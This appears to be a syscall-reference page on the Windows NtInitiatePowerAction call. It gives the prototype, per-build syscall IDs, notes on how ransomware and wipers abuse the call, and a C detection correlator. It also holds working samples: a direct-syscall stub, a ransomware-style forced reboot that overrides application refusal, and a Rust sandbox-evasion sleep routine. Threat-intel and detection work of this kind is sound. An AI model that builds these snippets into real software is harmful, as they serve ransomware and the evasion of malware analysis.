> Windows Syscalls
Module: ntoskrnl.exe | ATT&CK: T1529, T1485, T1497

NtInitiatePowerAction

Requests the power manager to perform a system-wide power action (sleep, hibernate, shutdown, reboot).

Prototype

```c
NTSTATUS NtInitiatePowerAction(
  POWER_ACTION       SystemAction,
  SYSTEM_POWER_STATE MinSystemState,
  ULONG              Flags,
  BOOLEAN            Asynchronous
);
```

Arguments

| Name | Type | Dir | Description |
|---|---|---|---|
| SystemAction | POWER_ACTION | in | Action to perform (winnt.h values): PowerActionSleep (2), PowerActionHibernate (3), PowerActionShutdown (4), PowerActionShutdownReset (5, reboot), PowerActionShutdownOff (6, power off), PowerActionWarmEject (7), PowerActionDisplayOff (8). |
| MinSystemState | SYSTEM_POWER_STATE | in | Minimum acceptable target state: PowerSystemWorking (1), PowerSystemSleeping1..3 (2..4), PowerSystemHibernate (5), PowerSystemShutdown (6). |
| Flags | ULONG | in | POWER_ACTION_* flags controlling policy: QUERY_ALLOWED (0x1), UI_ALLOWED (0x2), OVERRIDE_APPS (0x4), DISABLE_WAKES (0x40000000), CRITICAL (0x80000000). |
| Asynchronous | BOOLEAN | in | TRUE returns immediately; FALSE blocks until the action is fully arbitrated and carried out. |

Syscall IDs by Windows version

| Windows version | Syscall ID | Build |
|---|---|---|
| Win10 1507 | 0xF1 | win10-1507 |
| Win10 1607 | 0xF5 | win10-1607 |
| Win10 1703 | 0xF8 | win10-1703 |
| Win10 1709 | 0xF9 | win10-1709 |
| Win10 1803 | 0xFA | win10-1803 |
| Win10 1809 | 0xFB | win10-1809 |
| Win10 1903 | 0xFC | win10-1903 |
| Win10 1909 | 0xFC | win10-1909 |
| Win10 2004 | 0x101 | win10-2004 |
| Win10 20H2 | 0x101 | win10-20h2 |
| Win10 21H1 | 0x101 | win10-21h1 |
| Win10 21H2 | 0x102 | win10-21h2 |
| Win10 22H2 | 0x102 | win10-22h2 |
| Win11 21H2 | 0x107 | win11-21h2 |
| Win11 22H2 | 0x108 | win11-22h2 |
| Win11 23H2 | 0x108 | win11-23h2 |
| Win11 24H2 | 0x10A | win11-24h2 |
| Server 2016 | 0xF5 | winserver-2016 |
| Server 2019 | 0xFB | winserver-2019 |
| Server 2022 | 0x106 | winserver-2022 |
| Server 2025 | 0x10A | winserver-2025 |

Kernel module

ntoskrnl.exe: NtInitiatePowerAction

Related APIs

InitiatePowerActionW, SetSuspendState, ExitWindowsEx, InitiateShutdownW, NtSetSystemPowerState, SetSystemPowerState

Syscall stub

```asm
4C 8B D1                  mov r10, rcx
B8 0A 01 00 00            mov eax, 0x10A
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03                     jne short +3
0F 05                     syscall
C3                        ret
CD 2E                     int 2Eh
C3                        ret
```

Undocumented notes

Top-level power action entry point: `SetSuspendState` (via powrprof.dll), `ExitWindowsEx` (for the shutdown/reboot variants) and the Modern Standby fast paths all route through here. Unlike `NtSetSystemPowerState`, which performs the transition immediately, this call hands the request to the **power policy manager**: the action is arbitrated against power policy, user-mode clients receive WM_POWERBROADCAST notifications, `QUERY_ALLOWED` lets the request be refused, and only if policy permits is the transition actually performed (ultimately through the same path `NtSetSystemPowerState` takes). Note that the application veto (PBT_APMQUERYSUSPEND) was removed in Windows Vista; on current builds applications are only notified (PBT_APMSUSPEND) and cannot refuse, while drivers can still fail the query. Requires `SeShutdownPrivilege`; without it the call returns STATUS_PRIVILEGE_NOT_HELD. The `Asynchronous` parameter is the critical operational knob: TRUE returns immediately and the caller cannot detect refusal; FALSE blocks until the action completes (for sleep, until the system resumes) or a driver vetoes it.

Common malware usage

**Ransomware post-encryption reboot** is the dominant abuse. Royal, BlackCat/ALPHV, Conti, LockBit 3.0 and BlackSuit all issue an InitiatePowerAction-class reboot after they finish writing the ransom note. The reboot forces the note onto the screen (some families alter the boot configuration or drop the machine into Windows RE) and interrupts any backup or recovery job that was still running; it is not what removes Volume Shadow Copies, which these families delete earlier with vssadmin or WMI. **Wipers** (HermeticWiper, IsaacWiper, WhisperGate, CaddyWiper) similarly trigger a ShutdownReset so the box comes back up on corrupted boot data. A smaller class of red-team loaders calls PowerActionSleep with `DISABLE_WAKES | CRITICAL` to outlast short-lived sandbox sessions. `SeShutdownPrivilege` is no obstacle for malware running as an administrator or LocalSystem, and on client SKUs it is assigned to the Users group by default (present but disabled in the token until enabled with AdjustTokenPrivileges); on server SKUs only Administrators and Backup Operators hold it, so code running under an ordinary service account there gets STATUS_PRIVILEGE_NOT_HELD, which is why most ransomware ships a separate elevation primitive first.

Detection opportunities

The Microsoft-Windows-Kernel-Power ETW provider records the transitions the kernel power manager initiates; the one that reaches the System log is Event ID 109 (the kernel power manager has initiated a shutdown transition). Event ID 1074 (source User32) records the initiating process, user and reason for a clean shutdown or reboot, but it is written by the Winlogon/ExitWindowsEx path, so a direct NtInitiatePowerAction call that skips that path may not produce one; correlate with 109 and with 6008 (the previous shutdown was unexpected). 6005/6006 are the Event Log service starting and stopping and simply bracket each boot. The most actionable behavioral rule: a process that issued more than N file writes or renames in the last 60 seconds and then requests a Shutdown/ShutdownReset/ShutdownOff class power action is a high-confidence ransomware indicator. Enabling SeShutdownPrivilege from a non-interactive token (Security Event ID 4703, Token Right Adjusted, where that subcategory is audited) is itself unusual and worth alerting on. EDRs that hook ntdll see this call directly; direct-syscall variants bypass ntdll but still leave the kernel-side event trail.
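The "many file writes, then a shutdown-class power action" rule is simple enough to run as a stateful correlator over process telemetry. The following is an added example, not code from the original page: it replays a constructed event stream (simplified records with a timestamp, pid, kind, action and flags; the field names, the 60-second window and the threshold N are assumptions to tune per environment), keeps only the newest N write timestamps per pid, and raises an alert with the decoded POWER_ACTION_* flags when a shutdown-class request arrives with N or more writes inside the window. Sleep and hibernate requests are deliberately ignored, since a reboot is what the rule is about.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified telemetry record; field names are assumptions, not a real schema. */
enum { EV_FILE_WRITE = 1, EV_POWER_ACTION = 2 };
typedef struct { uint64_t ts; uint32_t pid; int kind; uint32_t action; uint32_t flags; } event_t;

/* POWER_ACTION values and POWER_ACTION_* flags as defined in winnt.h */
enum { PA_SLEEP = 2, PA_HIBERNATE = 3, PA_SHUTDOWN = 4, PA_SHUTDOWN_RESET = 5, PA_SHUTDOWN_OFF = 6 };
static const struct { uint32_t bit; const char *name; } kFlagNames[] = {
    { 0x00000001, "QUERY_ALLOWED" }, { 0x00000002, "UI_ALLOWED" },
    { 0x00000004, "OVERRIDE_APPS" }, { 0x40000000, "DISABLE_WAKES" },
    { 0x80000000, "CRITICAL" },
};

#define WINDOW_SECS     60    /* look-back window from the rule               */
#define WRITE_THRESHOLD 200   /* N: assumption, tune per environment          */
#define MAX_PIDS        32

typedef struct { uint32_t pid; uint64_t ring[WRITE_THRESHOLD]; size_t head, count; } pid_state_t;
typedef struct { uint32_t pid; uint64_t ts; uint32_t action; size_t writes; char flags[96]; } alert_t;

static pid_state_t g_state[MAX_PIDS];
static size_t g_npids;

static pid_state_t *state_for(uint32_t pid)
{
    for (size_t i = 0; i < g_npids; i++) if (g_state[i].pid == pid) return &g_state[i];
    if (g_npids == MAX_PIDS) return NULL;
    memset(&g_state[g_npids], 0, sizeof g_state[0]);
    g_state[g_npids].pid = pid;
    return &g_state[g_npids++];
}

/* Render flags as "OVERRIDE_APPS|DISABLE_WAKES|CRITICAL" for the alert. */
const char *describe_flags(uint32_t flags, char *out, size_t cap)
{
    out[0] = '\0';
    for (size_t i = 0; i < sizeof kFlagNames / sizeof kFlagNames[0]; i++) {
        if (!(flags & kFlagNames[i].bit)) continue;
        if (out[0]) strncat(out, "|", cap - strlen(out) - 1);
        strncat(out, kFlagNames[i].name, cap - strlen(out) - 1);
    }
    return out;
}

static int is_shutdown_class(uint32_t a)
{ return a == PA_SHUTDOWN || a == PA_SHUTDOWN_RESET || a == PA_SHUTDOWN_OFF; }

/* Replay events (ordered per pid); alert when a pid requests a shutdown-class
 * action with >= WRITE_THRESHOLD file writes in the preceding WINDOW_SECS. */
size_t run_detection(const event_t *ev, size_t n, alert_t *out, size_t cap)
{
    size_t nalerts = 0;
    g_npids = 0;
    for (size_t i = 0; i < n; i++) {
        pid_state_t *s = state_for(ev[i].pid);
        if (!s) continue;
        if (ev[i].kind == EV_FILE_WRITE) {
            s->ring[s->head] = ev[i].ts;            /* keep only the newest N stamps */
            s->head = (s->head + 1) % WRITE_THRESHOLD;
            if (s->count < WRITE_THRESHOLD) s->count++;
        } else if (ev[i].kind == EV_POWER_ACTION && is_shutdown_class(ev[i].action)) {
            size_t recent = 0;
            for (size_t k = 0; k < s->count; k++)
                if (s->ring[k] + WINDOW_SECS >= ev[i].ts) recent++;
            if (recent >= WRITE_THRESHOLD && nalerts < cap) {
                alert_t *a = &out[nalerts++];
                a->pid = ev[i].pid; a->ts = ev[i].ts; a->action = ev[i].action; a->writes = recent;
                describe_flags(ev[i].flags, a->flags, sizeof a->flags);
            }
        }
    }
    return nalerts;
}

/* Constructed sample stream (not real telemetry): pid 4242 writes 300 files in
 * 30 s, asks for S3 sleep, then reboots with app override; pid 1001 writes 5
 * files and reboots normally. Only the pid 4242 reboot should alert. */
size_t build_sample(event_t *buf, size_t cap)
{
    size_t n = 0;
    for (uint32_t i = 0; i < 300 && n < cap; i++)
        buf[n++] = (event_t){ 1000 + i / 10, 4242, EV_FILE_WRITE, 0, 0 };
    for (uint32_t i = 0; i < 5 && n < cap; i++)
        buf[n++] = (event_t){ 1000 + i, 1001, EV_FILE_WRITE, 0, 0 };
    if (n < cap) buf[n++] = (event_t){ 1031, 4242, EV_POWER_ACTION, PA_SLEEP, 0x40000000 };
    if (n < cap) buf[n++] = (event_t){ 1032, 4242, EV_POWER_ACTION, PA_SHUTDOWN_RESET, 0xC0000004 };
    if (n < cap) buf[n++] = (event_t){ 1040, 1001, EV_POWER_ACTION, PA_SHUTDOWN_RESET, 0x00000003 };
    return n;
}

/* Run the sample through the rule; returns the alert count, copies the first. */
size_t demo_alerts(alert_t *first)
{
    static event_t evs[400];
    alert_t alerts[4];
    size_t n = run_detection(evs, build_sample(evs, 400), alerts, 4);
    if (n && first) *first = alerts[0];
    return n;
}

uint32_t demo_first_alert_pid(void) { alert_t a; return demo_alerts(&a) ? a.pid : 0; }

int main(void)
{
    alert_t a;
    if (demo_alerts(&a))
        printf("ALERT pid=%u ts=%llu action=%u writes_in_window=%zu flags=%s\n",
               a.pid, (unsigned long long)a.ts, a.action, a.writes, a.flags);
    return 0;
}
```

In production the write counter would be fed from file-create/rename telemetry (Sysmon 11/23 or the EDR's own file events) and the power-action event from a hook or from Kernel-Power 109 plus the process context your sensor attaches; the ring keeps memory bounded at N timestamps per process regardless of how noisy the writer is.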

Direct syscall examples

x64 direct stub (Win11 24H2)

```asm
; Direct syscall stub for NtInitiatePowerAction (SSN 0x10A on Win11 24H2)
; The SSN must be resolved per build (see the table above); a hard-coded
; value breaks on the next feature update.
NtInitiatePowerAction PROC
    mov  r10, rcx          ; syscall convention: first argument goes in r10
    mov  eax, 10Ah         ; SSN, varies per build
    syscall
    ret
NtInitiatePowerAction ENDP
```

Ransomware post-encryption reboot

```c
// Final step after the encryption pass and ransom-note drop.
// PowerActionShutdownReset (5) is the reboot; PowerSystemShutdown (6) is the
// matching minimum state. Flags: CRITICAL (0x80000000) | DISABLE_WAKES
// (0x40000000) | OVERRIDE_APPS (0x4) = 0xC0000004, i.e. ignore app refusal.
#include <windows.h>
#include <winternl.h>

// Not declared by winternl.h; the enums and POWER_ACTION_* flags come from winnt.h.
typedef NTSTATUS (NTAPI *pNtInitiatePowerAction)(POWER_ACTION, SYSTEM_POWER_STATE, ULONG, BOOLEAN);

VOID PostEncryptReboot(VOID) {
    pNtInitiatePowerAction NtInitiatePowerAction = (pNtInitiatePowerAction)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtInitiatePowerAction");
    if (!NtInitiatePowerAction) return;
    // SeShutdownPrivilege assumed already enabled; otherwise STATUS_PRIVILEGE_NOT_HELD
    NTSTATUS st = NtInitiatePowerAction(
        /* SystemAction   */ PowerActionShutdownReset,
        /* MinSystemState */ PowerSystemShutdown,
        /* Flags          */ POWER_ACTION_CRITICAL | POWER_ACTION_DISABLE_WAKES | POWER_ACTION_OVERRIDE_APPS,
        /* Asynchronous   */ FALSE);   // block until the reboot is accepted or vetoed
    (void)st;
}
```

Sandbox evasion via critical sleep

```rust
// Cargo: windows-sys = "0.59" with features Win32_Foundation, Win32_Security,
// Win32_System_Threading.
// Try to put the analysis VM into S3 sleep before the loader's real work runs.
// Async + DISABLE_WAKES | CRITICAL keeps most sandbox harnesses from resuming it cleanly.
use windows_sys::Win32::Foundation::*;
use windows_sys::Win32::Security::*;
use windows_sys::Win32::System::Threading::*;

#[link(name = "ntdll")]
extern "system" {
    // NTSTATUS NtInitiatePowerAction(POWER_ACTION, SYSTEM_POWER_STATE, ULONG, BOOLEAN)
    fn NtInitiatePowerAction(action: u32, min_state: u32, flags: u32, asynch: u8) -> i32;
}

const POWER_ACTION_SLEEP: u32 = 2;            // PowerActionSleep
const POWER_SYSTEM_SLEEPING3: u32 = 4;        // PowerSystemSleeping3 (S3)
const POWER_ACTION_DISABLE_WAKES: u32 = 0x4000_0000;
const POWER_ACTION_CRITICAL: u32 = 0x8000_0000;
const STATUS_PRIVILEGE_NOT_HELD: i32 = 0xC000_0061u32 as i32;

pub unsafe fn evade_via_sleep() -> i32 {
    // Enable SeShutdownPrivilege, which NtInitiatePowerAction requires.
    let mut tok: HANDLE = std::mem::zeroed();
    if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &mut tok) == 0 {
        return STATUS_PRIVILEGE_NOT_HELD;
    }
    let name: Vec<u16> = "SeShutdownPrivilege\0".encode_utf16().collect();
    let mut tp: TOKEN_PRIVILEGES = std::mem::zeroed();
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if LookupPrivilegeValueW(std::ptr::null(), name.as_ptr(), &mut tp.Privileges[0].Luid) == 0 {
        CloseHandle(tok);
        return STATUS_PRIVILEGE_NOT_HELD;
    }
    AdjustTokenPrivileges(tok, 0, &tp, 0, std::ptr::null_mut(), std::ptr::null_mut());
    CloseHandle(tok);
    // Asynchronous = TRUE: return at once; the loader never learns if the sleep was refused.
    NtInitiatePowerAction(POWER_ACTION_SLEEP, POWER_SYSTEM_SLEEPING3,
                          POWER_ACTION_DISABLE_WAKES | POWER_ACTION_CRITICAL, 1)
}
```

MITRE ATT&CK mappings

- T1529 System Shutdown/Reboot (the shutdown, reboot and power-off actions)
- T1485 Data Destruction (wiper reboot onto corrupted boot data)
- T1497 Virtualization/Sandbox Evasion (critical sleep with wakes disabled)

Last verified: 2026-05-20